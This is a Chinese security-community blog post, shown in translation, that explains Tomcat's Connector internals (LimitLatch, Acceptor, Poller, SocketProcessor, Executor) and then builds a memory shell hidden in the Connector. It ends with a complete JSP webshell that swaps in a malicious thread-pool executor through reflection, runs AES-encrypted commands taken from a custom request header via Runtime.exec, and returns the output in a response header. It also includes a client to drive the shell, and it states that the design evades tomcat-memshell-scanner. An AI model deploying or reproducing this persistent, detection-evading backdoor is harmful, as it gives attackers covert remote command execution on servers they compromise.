Preface
PS: This article represents only my own limited views; please point out any mistakes or gaps in understanding.
For the sake of extensibility, Tomcat decouples its components from one another to a large degree.
Memory-shell detection tools such as memshell scanner, however, mostly scan the services registered inside the Container.
So can we inject a memory shell inside the Connector instead?
Main Body
Background
Let's first look at the concrete implementation of the Connector.
As mentioned in Tomcat Notes (Part 1), the Connector consists mainly of a ProtocolHandler and an Adapter.
The ProtocolHandler, in turn, is composed mainly of an Endpoint and a Processor:
Depending on the implementation, ProtocolHandler comes in the following variants:
In this article we focus on the Http11NioProtocol implementation.
Endpoint
The Endpoint is one component of the ProtocolHandler, and NioEndpoint is its implementation in Http11NioProtocol.
The Endpoint's five major components:
- LimitLatch: the connection limiter, which enforces the maximum number of connections
- Acceptor: accepts new connections and hands the resulting Channel to the Poller
- Poller: essentially the Selector from NIO; monitors the state of the registered Channels
- SocketProcessor: can be seen as a wrapped task class
- Executor: Tomcat's own extended thread pool, used to run the task classes
LimitLatch
LimitLatch controls the maximum number of connections Tomcat will accept. Once the limit is exceeded, the thread handling the new connection blocks and waits until another connection is released before the new one is taken up.
public class LimitLatch {
private static final Log log = LogFactory.getLog(LimitLatch.class);
private class Sync extends AbstractQueuedSynchronizer {
private static final long serialVersionUID = 1L;
public Sync() {
}
@Override
protected int tryAcquireShared(int ignored) {
long newCount = count.incrementAndGet();
if (!released && newCount > limit) {
// Limit exceeded
count.decrementAndGet();
return -1;
} else {
return 1;
}
}
@Override
protected boolean tryReleaseShared(int arg) {
count.decrementAndGet();
return true;
}
}
private final Sync sync;
// current connection count
private final AtomicLong count;
// maximum connection count
private volatile long limit;
private volatile boolean released = false;
}
// methods implemented in the AbstractEndpoint class
......
protected LimitLatch initializeConnectionLatch() {
if (this.maxConnections == -1) {
return null;
} else {
if (this.connectionLimitLatch == null) {
this.connectionLimitLatch = new LimitLatch((long)this.getMaxConnections());
}
return this.connectionLimitLatch;
}
}
protected void releaseConnectionLatch() {
LimitLatch latch = this.connectionLimitLatch;
if (latch != null) {
latch.releaseAll();
}
this.connectionLimitLatch = null;
}
protected void countUpOrAwaitConnection() throws InterruptedException {
if (this.maxConnections != -1) {
LimitLatch latch = this.connectionLimitLatch;
if (latch != null) {
latch.countUpOrAwait();
}
}
}
protected long countDownConnection() {
if (this.maxConnections == -1) {
return -1L;
} else {
LimitLatch latch = this.connectionLimitLatch;
if (latch != null) {
long result = latch.countDown();
if (result < 0L) {
this.getLog().warn(sm.getString("endpoint.warn.incorrectConnectionCount"));
}
return result;
} else {
return -1L;
}
}
}
......
Acceptor
The Acceptor is responsible for accepting incoming connections.
// the generic Acceptor prototype used by AbstractEndpoint
......
public class Acceptor<U> implements Runnable {
private static final int INITIAL_ERROR_DELAY = 50;
private static final int MAX_ERROR_DELAY = 1600;
@Override
public void run() {
int errorDelay = 0;
// loop until a shutdown command is received
while (endpoint.isRunning()) {
// if the Endpoint is paused, sleep in a loop
while (endpoint.isPaused() && endpoint.isRunning()) {
state = AcceptorState.PAUSED;
try {
Thread.sleep(50); // poll the endpoint's running state every 50 ms
} catch (InterruptedException e) {
}
}
if (!endpoint.isRunning()) {
break;
}
state = AcceptorState.RUNNING;
try {
endpoint.countUpOrAwaitConnection(); // enforce the maximum connection count
if (endpoint.isPaused()) {
continue;
}
U socket = null;
try {
socket = endpoint.serverSocketAccept(); // accept a connection, producing a socket/channel
} catch (Exception ioe) {
endpoint.countDownConnection();
if (endpoint.isRunning()) {
errorDelay = handleExceptionWithDelay(errorDelay); // back off before the next accept attempt
throw ioe; // rethrow so the catch block at c1 handles it
} else {
break;
}
}
errorDelay = 0; // reset the error delay after a successful accept
if (endpoint.isRunning() && !endpoint.isPaused()) {
// setSocketOptions() hands the socket to the appropriate processor
if (!endpoint.setSocketOptions(socket)) {
endpoint.closeSocket(socket);
}
} else {
endpoint.destroySocket(socket); // otherwise destroy the socket/channel
}
} catch (Throwable t) { // c1
ExceptionUtils.handleThrowable(t); // rethrows fatal throwables
String msg = sm.getString("endpoint.accept.fail");
if (t instanceof Error) {
... // log the error
}
}
}
state = AcceptorState.ENDED; // mark the state as ENDED
}
protected int handleExceptionWithDelay(int currentErrorDelay) {
if (currentErrorDelay > 0) {
try {
Thread.sleep(currentErrorDelay);
} catch (InterruptedException e) {
// Ignore
}
}
// exponential backoff: start at 50 ms (c2), doubling up to 1600 ms
if (currentErrorDelay == 0) {
return INITIAL_ERROR_DELAY; // c2
} else if (currentErrorDelay < MAX_ERROR_DELAY) {
return currentErrorDelay * 2;
} else {
return MAX_ERROR_DELAY;
}
}
}
......
// starting the Acceptor threads in the AbstractEndpoint class
......
protected void startAcceptorThreads() {
int count = getAcceptorThreadCount();
acceptors = new ArrayList<>(count);
for (int i = 0; i < count; i++) {
Acceptor<U> acceptor = new Acceptor<>(this);
String threadName = getName() + "-Acceptor-" + i;
acceptor.setThreadName(threadName);
acceptors.add(acceptor);
Thread t = new Thread(acceptor, threadName);
t.setPriority(getAcceptorThreadPriority());
t.setDaemon(getDaemon());
t.start();
}
}
......
// NioEndpoint's concrete handling of the SocketChannel
protected class Acceptor extends org.apache.tomcat.util.net.AbstractEndpoint.Acceptor {
protected Acceptor() {
}
public void run() {
byte errorDelay = 0;
while(NioEndpoint.this.running) {
while(NioEndpoint.this.paused && NioEndpoint.this.running) {
this.state = AcceptorState.PAUSED;
try {
Thread.sleep(50L);
} catch (InterruptedException var4) {
}
}
if (!NioEndpoint.this.running) {
break;
}
this.state = AcceptorState.RUNNING;
try {
NioEndpoint.this.countUpOrAwaitConnection();
SocketChannel socket = null;
try {
socket = NioEndpoint.this.serverSock.accept();
} catch (IOException var5) {
NioEndpoint.this.countDownConnection();
if (!NioEndpoint.this.running) {
break;
}
NioEndpoint.this.handleExceptionWithDelay(errorDelay);
throw var5;
}
errorDelay = 0;
if (NioEndpoint.this.running && !NioEndpoint.this.paused) {
if (!NioEndpoint.this.setSocketOptions(socket)) {
this.closeSocket(socket);
}
} else {
this.closeSocket(socket);
}
} catch (Throwable var6) {
ExceptionUtils.handleThrowable(var6);
NioEndpoint.log.error(AbstractEndpoint.sm.getString("endpoint.accept.fail"), var6);
}
}
this.state = AcceptorState.ENDED;
}
private void closeSocket(SocketChannel socket) {
NioEndpoint.this.countDownConnection();
try {
socket.socket().close();
} catch (IOException var4) {
if (NioEndpoint.log.isDebugEnabled()) {
NioEndpoint.log.debug(AbstractEndpoint.sm.getString("endpoint.err.close"), var4);
}
}
try {
socket.close();
} catch (IOException var3) {
if (NioEndpoint.log.isDebugEnabled()) {
NioEndpoint.log.debug(AbstractEndpoint.sm.getString("endpoint.err.close"), var3);
}
}
}
}
Poller
public class Poller implements Runnable {
......
@Override
public void run() {
// Loop until destroy() is called
while (true) {
boolean hasEvents = false;
try {
if (!close) {
// check whether connections have come in; if so, register their Channels with the Selector
hasEvents = events();
}
if (close) {
events();
timeout(0, false);
try {
selector.close();
} catch (IOException ioe) {
log.error(sm.getString("endpoint.nio.selectorCloseFail"), ioe);
}
break;
}
} catch (Throwable x) {
ExceptionUtils.handleThrowable(x);
log.error(sm.getString("endpoint.nio.selectorLoopError"), x);
continue;
}
if (keyCount == 0) {
hasEvents = (hasEvents | events());
}
Iterator<SelectionKey> iterator =
keyCount > 0 ? selector.selectedKeys().iterator() : null;
// Walk through the collection of ready keys and dispatch
// any active event.
while (iterator != null && iterator.hasNext()) {
SelectionKey sk = iterator.next();
NioSocketWrapper socketWrapper = (NioSocketWrapper) sk.attachment();
// Attachment may be null if another thread has called
// cancelledKey()
if (socketWrapper == null) {
iterator.remove();
} else {
iterator.remove();
processKey(sk, socketWrapper);
}
}
// Process timeouts
timeout(keyCount,hasEvents);
}
getStopLatch().countDown();
}
......
}
The events() method checks whether PollerEvent objects are queued; if so, it dequeues them and registers each event's Channel with the Selector, then keeps polling all registered Channels to see whether any events have occurred.
When an event fires, a SocketProcessor is handed to the Executor for execution.
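To make the registration step concrete, here is a simplified sketch of PollerEvent.run(), paraphrased from the Tomcat sources (field and method names vary slightly between versions, so treat this as illustrative rather than exact):
public void run() {
    if (interestOps == OP_REGISTER) {
        // Newly accepted connection: register the channel for reads and attach
        // the NioSocketWrapper that processKey() later pulls back out of the key.
        socket.getIOChannel().register(
                socket.getPoller().getSelector(), SelectionKey.OP_READ, socketWrapper);
    } else {
        // Existing connection: merge the requested interestOps into its key.
        SelectionKey key = socket.getIOChannel().keyFor(socket.getPoller().getSelector());
        if (key != null) {
            key.interestOps(key.interestOps() | interestOps);
        }
    }
}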
SocketProcessor
protected class SocketProcessor extends SocketProcessorBase<NioChannel> {
public SocketProcessor(SocketWrapperBase<NioChannel> socketWrapper, SocketEvent event) {
super(socketWrapper, event);
}
protected void doRun() {
NioChannel socket = (NioChannel)this.socketWrapper.getSocket();
SelectionKey key = socket.getIOChannel().keyFor(socket.getPoller().getSelector());
try {
int handshake = -1;
try {
if (key != null) {
if (socket.isHandshakeComplete()) {
handshake = 0;
} else if (this.event != SocketEvent.STOP && this.event != SocketEvent.DISCONNECT && this.event != SocketEvent.ERROR) {
handshake = socket.handshake(key.isReadable(), key.isWritable());
this.event = SocketEvent.OPEN_READ;
} else {
handshake = -1;
}
}
} catch (IOException var12) {
handshake = -1;
if (NioEndpoint.log.isDebugEnabled()) {
NioEndpoint.log.debug("Error during SSL handshake", var12);
}
} catch (CancelledKeyException var13) {
handshake = -1;
}
if (handshake == 0) {
SocketState state = SocketState.OPEN;
if (this.event == null) {
state = NioEndpoint.this.getHandler().process(this.socketWrapper, SocketEvent.OPEN_READ);
} else {
state = NioEndpoint.this.getHandler().process(this.socketWrapper, this.event); // the key point: the corresponding handler's process() methods are invoked here
}
if (state == SocketState.CLOSED) {
NioEndpoint.this.close(socket, key);
}
} else if (handshake == -1) {
NioEndpoint.this.getHandler().process(this.socketWrapper, SocketEvent.CONNECT_FAIL);
NioEndpoint.this.close(socket, key);
} else if (handshake == 1) {
this.socketWrapper.registerReadInterest();
} else if (handshake == 4) {
this.socketWrapper.registerWriteInterest();
}
} catch (CancelledKeyException var14) {
socket.getPoller().cancelledKey(key);
} catch (VirtualMachineError var15) {
ExceptionUtils.handleThrowable(var15);
} catch (Throwable var16) {
NioEndpoint.log.error("", var16);
socket.getPoller().cancelledKey(key);
} finally {
this.socketWrapper = null;
this.event = null;
if (NioEndpoint.this.running && !NioEndpoint.this.paused) {
NioEndpoint.this.processorCache.push(this);
}
}
}
}
Executor
See below.
The Executor, and the implementation of a malicious Executor:
//most Javadoc removed; consult the JDK sources if interested
public interface Executor {
/**
* Executes the given command at some time in the future. The command
* may execute in a new thread, in a pooled thread, or in the calling
* thread, at the discretion of the {@code Executor} implementation.
*
* @param command the runnable task
* @throws RejectedExecutionException if this task cannot be
* accepted for execution
* @throws NullPointerException if command is null
*/
void execute(Runnable command);
}
The Executor is really Tomcat's customized thread pool. We need not dwell on its design, but one point deserves attention:
In Tomcat, Executors are maintained by the Service, so components within the same Service can share one thread pool. If no thread pool is defined, the relevant component (such as the Endpoint) creates its own, and that pool is no longer shared.
(This is also why, earlier, when I got hold of the Service and added an executor directly to its executors array, it had no effect.)
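For reference, when no shared pool is configured, AbstractEndpoint spins up its own internal pool, roughly like this (paraphrased from the Tomcat 9 sources):
// Paraphrased from org.apache.tomcat.util.net.AbstractEndpoint#createExecutor.
public void createExecutor() {
    internalExecutor = true; // marks the pool as endpoint-private, not Service-managed
    TaskQueue taskqueue = new TaskQueue();
    TaskThreadFactory tf = new TaskThreadFactory(getName() + "-exec-", daemon, getThreadPriority());
    // Note: this is org.apache.tomcat.util.threads.ThreadPoolExecutor,
    // Tomcat's subclass, not the plain java.util.concurrent one.
    executor = new ThreadPoolExecutor(getMinSpareThreads(), getMaxThreads(),
            60, TimeUnit.SECONDS, taskqueue, tf);
    taskqueue.setParent((ThreadPoolExecutor) executor);
}
Replacing this endpoint-private executor is therefore enough; nothing at the Service level needs to change.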
As you can see, what is fetched here is the ThreadPoolExecutor that the Endpoint started on its own:
And the key call sits on the very next line: executor.execute().
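That call site is AbstractEndpoint#processSocket, which looks roughly like this (simplified from the Tomcat 9 sources; logging omitted):
public boolean processSocket(SocketWrapperBase<S> socketWrapper, SocketEvent event, boolean dispatch) {
    try {
        if (socketWrapper == null) {
            return false;
        }
        SocketProcessorBase<S> sc = processorCache.pop();
        if (sc == null) {
            sc = createSocketProcessor(socketWrapper, event);
        } else {
            sc.reset(socketWrapper, event);
        }
        Executor executor = getExecutor(); // the executor we are about to replace
        if (dispatch && executor != null) {
            executor.execute(sc);          // the key call
        } else {
            sc.run();
        }
    } catch (RejectedExecutionException ree) {
        return false;
    } catch (Throwable t) {
        ExceptionUtils.handleThrowable(t);
        return false;
    }
    return true;
}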
Having located the core processing logic, we only need to subclass the pool and override that method, embedding our malicious logic in it.
public class threadexcutor extends ThreadPoolExecutor {
......
public threadexcutor(int corePoolSize, int maximumPoolSize, long keepAliveTime, TimeUnit unit, BlockingQueue<Runnable> workQueue, ThreadFactory threadFactory, RejectedExecutionHandler handler) {
super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory, handler);
}
......
@Override
public void execute(Runnable command) {
System.out.println("123");
//Evil code here
this.execute(command, 0L, TimeUnit.MILLISECONDS);
}
......
}
Using the setExecutor method on AbstractEndpoint, we swap the original executor for our malicious class.
After the swap, the executor used by the Endpoint has indeed become our malicious class:
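In code, the swap itself is only a few lines; the JSP at the end of this article does exactly this (the reflection helpers getStandardService() and getField() are shown there):
NioEndpoint nioEndpoint = (NioEndpoint) getStandardService();
ThreadPoolExecutor old = (ThreadPoolExecutor) getField(nioEndpoint, "executor");
// Reuse the original pool's sizing so behaviour is unchanged apart from our hook.
threadexcutor evil = new threadexcutor(old.getCorePoolSize(), old.getMaximumPoolSize(),
        old.getKeepAliveTime(TimeUnit.MILLISECONDS), TimeUnit.MILLISECONDS,
        old.getQueue(), old.getThreadFactory(), old.getRejectedExecutionHandler());
nioEndpoint.setExecutor(evil);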
Implementing Interaction
Obtaining the Command
From the background above and from Tomcat Notes (Part 1), a standard ServletRequest exists only after the Processor has done its wrapping. If we want to pass the command in a request header, how can we reach it?
There is certainly more than one way. Here, with the help of a Java memory-searching tool, I found the appReadBufHandler of nioChannels inside NioEndpoint; its buffer evidently holds the raw request we need.
We simply extract the command field from it.
public String getRequest() {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), "threads"));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains("exec") && threadName.contains("Acceptor")) {
Object target = getField(thread, "target");
if (target instanceof Runnable) {
try {
Object[] objects = (Object[]) getField(getField(getField(target, "this$0"), "nioChannels"), "stack");
ByteBuffer heapByteBuffer = (ByteBuffer) getField(getField(objects[0], "appReadBufHandler"), "byteBuffer");
String a = new String(heapByteBuffer.array(), "UTF-8");
if (a.indexOf("blue0") > -1) {
System.out.println(a.indexOf("blue0"));
System.out.println(a.indexOf("\r", a.indexOf("blue0")) - 1);
String b = a.substring(a.indexOf("blue0") + "blue0".length() + 1, a.indexOf("\r", a.indexOf("blue0")) - 1);
//System.out.println(b);
return b;
}
} catch (Exception var11) {
System.out.println(var11);
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
return new String();
}
Implementing Echo
The memory shell is injected before the Processor builds the standard ServletRequest, and obviously the complete ServletResponse is only produced after the Container has finished its processing. So how do we solve the echo problem?
Idea 1:
Talk to the client directly over the Socket at this point, transferring data as a raw byte stream.
(Theoretically feasible; untested. A rough sketch follows.)
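A minimal, hypothetical sketch of that idea, assuming we can reach the accepted SocketChannel (for instance via NioChannel.getIOChannel()); untested, as noted:
// Hypothetical sketch: write the command output straight back over the accepted
// channel, bypassing the HTTP response machinery entirely.
void rawEcho(java.nio.channels.SocketChannel ch, byte[] result) throws java.io.IOException {
    java.nio.ByteBuffer buf = java.nio.ByteBuffer.wrap(result);
    while (buf.hasRemaining()) {
        ch.write(buf);
    }
    // Caveats: the client must expect raw bytes instead of a valid HTTP response,
    // and Tomcat may still write its own response bytes onto the same channel afterwards.
}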
Idea 2:
Exploit Tomcat's behaviour when handling a request.
AbstractProcessor creates the Tomcat (Coyote) Request and Response when it is initialized, and Http11Processor, which extends AbstractProcessor, behaves the same way:
......
public AbstractProcessor(AbstractEndpoint<?> endpoint) {
this(endpoint, new Request(), new Response());
}
......
protected AbstractProcessor(AbstractEndpoint<?> endpoint, Request coyoteRequest, Response coyoteResponse) {
this.hostNameC = new char[0];
this.asyncTimeout = -1L;
this.asyncTimeoutGeneration = 0L;
this.socketWrapper = null;
this.errorState = ErrorState.NONE;
this.endpoint = endpoint;
this.asyncStateMachine = new AsyncStateMachine(this);
this.request = coyoteRequest;
this.response = coyoteResponse;
this.response.setHook(this);
this.request.setResponse(this.response);
this.request.setHook(this);
this.userDataHelper = new UserDataHelper(this.getLog());
}
......
Moreover, the Response is embedded in the Request object:
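The constructor above is what establishes this pairing (request.setResponse(this.response)), so given a coyote Request you can always reach its Response:
// The linkage set up in AbstractProcessor's constructor means this holds:
org.apache.coyote.Response resp = coyoteRequest.getResponse();
// The reflection chain used below (handler -> global -> processors -> req -> response)
// walks to the same object without needing a reference to the processor.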
After the logic in the Container completes, Http11Processor goes on to wrap our response further:
So we only need to put the result of command execution into Tomcat's response ahead of time; here I picked a header.
PS: I took a small detour at first, trying to dig out the buffer inside the original response structure and put(byte[]) the output into it directly. It turned out that growing the ByteBuffer is painful, and later Tomcat processing might overwrite the echoed bytes anyway.
So here I simply call response.addHeader() and place the result in a header.
public void getResponse(byte[] res) {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), "threads"));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains("exec") && threadName.contains("Acceptor")) {
Object target = getField(thread, "target");
if (target instanceof Runnable) {
try {
ArrayList objects = (ArrayList) getField(getField(getField(getField(target, "this$0"), "handler"), "global"),"processors");
for (Object tmp_object:objects) {
RequestInfo request = (RequestInfo)tmp_object;
Response response = (Response) getField(getField(request, "req"), "response");
response.addHeader("Server",new String(res,"UTF-8"));
//System.out.print("buffer add");
}
} catch (Exception var11) {
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
}
Final
For stealthier communication, AES encryption was added as a final touch:
The end result: if a request is found to carry our custom header, the malicious action runs and its output comes back in a custom response header; otherwise the request passes through as normal business traffic:
Likewise, because this memory shell does not live in the Container, tomcat-memshell-scanner cannot detect it:
jsp_demo
<%@ page import="org.apache.tomcat.util.net.NioEndpoint" %>
<%@ page import="org.apache.tomcat.util.threads.ThreadPoolExecutor" %>
<%@ page import="java.util.concurrent.TimeUnit" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.util.concurrent.BlockingQueue" %>
<%@ page import="java.util.concurrent.ThreadFactory" %>
<%@ page import="java.nio.ByteBuffer" %>
<%@ page import="java.util.ArrayList" %>
<%@ page import="org.apache.coyote.RequestInfo" %>
<%@ page import="org.apache.coyote.Response" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.nio.charset.StandardCharsets" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!
public static final String DEFAULT_SECRET_KEY = "blueblueblueblue";
private static final String AES = "AES";
private static final byte[] KEY_VI = "blueblueblueblue".getBytes();
private static final String CIPHER_ALGORITHM = "AES/CBC/PKCS5Padding";
private static java.util.Base64.Encoder base64Encoder = java.util.Base64.getEncoder();
private static java.util.Base64.Decoder base64Decoder = java.util.Base64.getDecoder();
public static String decode(String key, String content) {
try {
javax.crypto.SecretKey secretKey = new javax.crypto.spec.SecretKeySpec(key.getBytes(), AES);
javax.crypto.Cipher cipher = javax.crypto.Cipher.getInstance(CIPHER_ALGORITHM);
cipher.init(javax.crypto.Cipher.DECRYPT_MODE, secretKey, new javax.crypto.spec.IvParameterSpec(KEY_VI));
byte[] byteContent = base64Decoder.decode(content);
byte[] byteDecode = cipher.doFinal(byteContent);
return new String(byteDecode, java.nio.charset.StandardCharsets.UTF_8);
} catch (Exception e) {
e.printStackTrace();
}
return null;
}
public static String encode(String key, String content) {
try {
javax.crypto.SecretKey secretKey = new javax.crypto.spec.SecretKeySpec(key.getBytes(), AES);
javax.crypto.Cipher cipher = javax.crypto.Cipher.getInstance(CIPHER_ALGORITHM);
cipher.init(javax.crypto.Cipher.ENCRYPT_MODE, secretKey, new javax.crypto.spec.IvParameterSpec(KEY_VI));
byte[] byteEncode = content.getBytes(java.nio.charset.StandardCharsets.UTF_8);
byte[] byteAES = cipher.doFinal(byteEncode);
return base64Encoder.encodeToString(byteAES);
} catch (Exception e) {
e.printStackTrace();
}
return null;
}
public Object getField(Object object, String fieldName) {
Field declaredField;
Class clazz = object.getClass();
while (clazz != Object.class) {
try {
declaredField = clazz.getDeclaredField(fieldName);
declaredField.setAccessible(true);
return declaredField.get(object);
} catch (NoSuchFieldException | IllegalAccessException e) {
}
clazz = clazz.getSuperclass();
}
return null;
}
public Object getStandardService() {
Thread[] threads = (Thread[]) this.getField(Thread.currentThread().getThreadGroup(), "threads");
for (Thread thread : threads) {
if (thread == null) {
continue;
}
if ((thread.getName().contains("Acceptor")) && (thread.getName().contains("http"))) {
Object target = this.getField(thread, "target");
Object jioEndPoint = null;
try {
jioEndPoint = getField(target, "this$0");
} catch (Exception e) {
}
if (jioEndPoint == null) {
try {
jioEndPoint = getField(target, "endpoint");
} catch (Exception e) {
new Object();
}
} else {
return jioEndPoint;
}
}
}
return new Object();
}
public class threadexcutor extends ThreadPoolExecutor {
public threadexcutor(int corePoolSize, int maximumPoolSize, long keepAliveTime, TimeUnit unit, BlockingQueue<Runnable> workQueue, ThreadFactory threadFactory, RejectedExecutionHandler handler) {
super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory, handler);
}
public String getRequest() {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), "threads"));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains("exec") && threadName.contains("Acceptor")) {
Object target = getField(thread, "target");
if (target instanceof Runnable) {
try {
Object[] objects = (Object[]) getField(getField(getField(target, "this$0"), "nioChannels"), "stack");
ByteBuffer heapByteBuffer = (ByteBuffer) getField(getField(objects[0], "appReadBufHandler"), "byteBuffer");
String a = new String(heapByteBuffer.array(), "UTF-8");
if (a.indexOf("blue0") > -1) {
System.out.println(a.indexOf("blue0"));
System.out.println(a.indexOf("\r", a.indexOf("blue0")) - 1);
String b = a.substring(a.indexOf("blue0") + "blue0".length() + 1, a.indexOf("\r", a.indexOf("blue0")) - 1);
b = decode(DEFAULT_SECRET_KEY, b);
return b;
}
} catch (Exception var11) {
System.out.println(var11);
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
return new String();
}
public void getResponse(byte[] res) {
try {
Thread[] threads = (Thread[]) ((Thread[]) getField(Thread.currentThread().getThreadGroup(), "threads"));
for (Thread thread : threads) {
if (thread != null) {
String threadName = thread.getName();
if (!threadName.contains("exec") && threadName.contains("Acceptor")) {
Object target = getField(thread, "target");
if (target instanceof Runnable) {
try {
ArrayList objects = (ArrayList) getField(getField(getField(getField(target, "this$0"), "handler"), "global"), "processors");
for (Object tmp_object : objects) {
RequestInfo request = (RequestInfo) tmp_object;
Response response = (Response) getField(getField(request, "req"), "response");
response.addHeader("Server-token", encode(DEFAULT_SECRET_KEY, new String(res, "UTF-8")));
}
} catch (Exception var11) {
continue;
}
}
}
}
}
} catch (Exception ignored) {
}
}
@Override
public void execute(Runnable command) {
//System.out.println("123");
String cmd = getRequest();
if (cmd.length() > 1) {
try {
Runtime rt = Runtime.getRuntime();
Process process = rt.exec(cmd);
java.io.InputStream in = process.getInputStream();
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = "";
String tmp = "";
while ((tmp = stdInput.readLine()) != null) {
s += tmp;
}
if (!s.isEmpty()) {
byte[] res = s.getBytes(StandardCharsets.UTF_8);
getResponse(res);
}
} catch (IOException e) {
e.printStackTrace();
}
}
this.execute(command, 0L, TimeUnit.MILLISECONDS);
}
}
%>
<%
NioEndpoint nioEndpoint = (NioEndpoint) getStandardService();
ThreadPoolExecutor exec = (ThreadPoolExecutor) getField(nioEndpoint, "executor");
threadexcutor exe = new threadexcutor(exec.getCorePoolSize(), exec.getMaximumPoolSize(), exec.getKeepAliveTime(TimeUnit.MILLISECONDS), TimeUnit.MILLISECONDS, exec.getQueue(), exec.getThreadFactory(), exec.getRejectedExecutionHandler());
nioEndpoint.setExecutor(exe);
%>
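For completeness, here is a sketch of a matching client (hypothetical; not part of the original article). It speaks raw HTTP over a socket because the substring logic in getRequest() expects no space after the header colon and drops the character just before \r, so a trailing padding space is appended to the header value. Depending on buffer-recycling timing, the Server-token may arrive on this or on a follow-up request:
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class ShellClient {
    private static final String KEY = "blueblueblueblue"; // must match DEFAULT_SECRET_KEY in the JSP

    private static byte[] crypt(int mode, byte[] data) throws Exception {
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(mode, new SecretKeySpec(KEY.getBytes(), "AES"), new IvParameterSpec(KEY.getBytes()));
        return c.doFinal(data);
    }

    public static void main(String[] args) throws Exception {
        String cmd = args.length > 0 ? args[0] : "whoami";
        String enc = Base64.getEncoder().encodeToString(
                crypt(Cipher.ENCRYPT_MODE, cmd.getBytes(StandardCharsets.UTF_8)));
        try (Socket s = new Socket("127.0.0.1", 8080)) {
            // No space after "blue0:" and one trailing padding character,
            // to line up with the substring offsets in getRequest().
            String req = "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\nblue0:" + enc + " \r\n"
                    + "Connection: close\r\n\r\n";
            s.getOutputStream().write(req.getBytes(StandardCharsets.US_ASCII));
            BufferedReader in = new BufferedReader(
                    new InputStreamReader(s.getInputStream(), StandardCharsets.UTF_8));
            String line;
            while ((line = in.readLine()) != null) {
                if (line.startsWith("Server-token:")) {
                    byte[] raw = Base64.getDecoder().decode(
                            line.substring("Server-token:".length()).trim());
                    System.out.println(new String(crypt(Cipher.DECRYPT_MODE, raw), StandardCharsets.UTF_8));
                }
            }
        }
    }
}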
Afterword
This is offered to spark further ideas: following this line of thought, memory shells based on other components inside the Connector should also be achievable.
Please forgive my clumsy coding.
Thanks to su18 and 园长 for the encouragement.
References:
https://juejin.cn/post/6844903874122383374
https://cloud.tencent.com/developer/article/1745954
http://chujunjie.top/2019/04/21/Tomcat源码学习笔记-Connector组件-一/
- Author: bluE0
- Source: 先知社区 (Xianzhi Community)
- Original link: https://xz.aliyun.com/t/11593
- Copyright: Unless otherwise stated, all rights belong to the original author and the publishing platform. Please credit the source when reposting!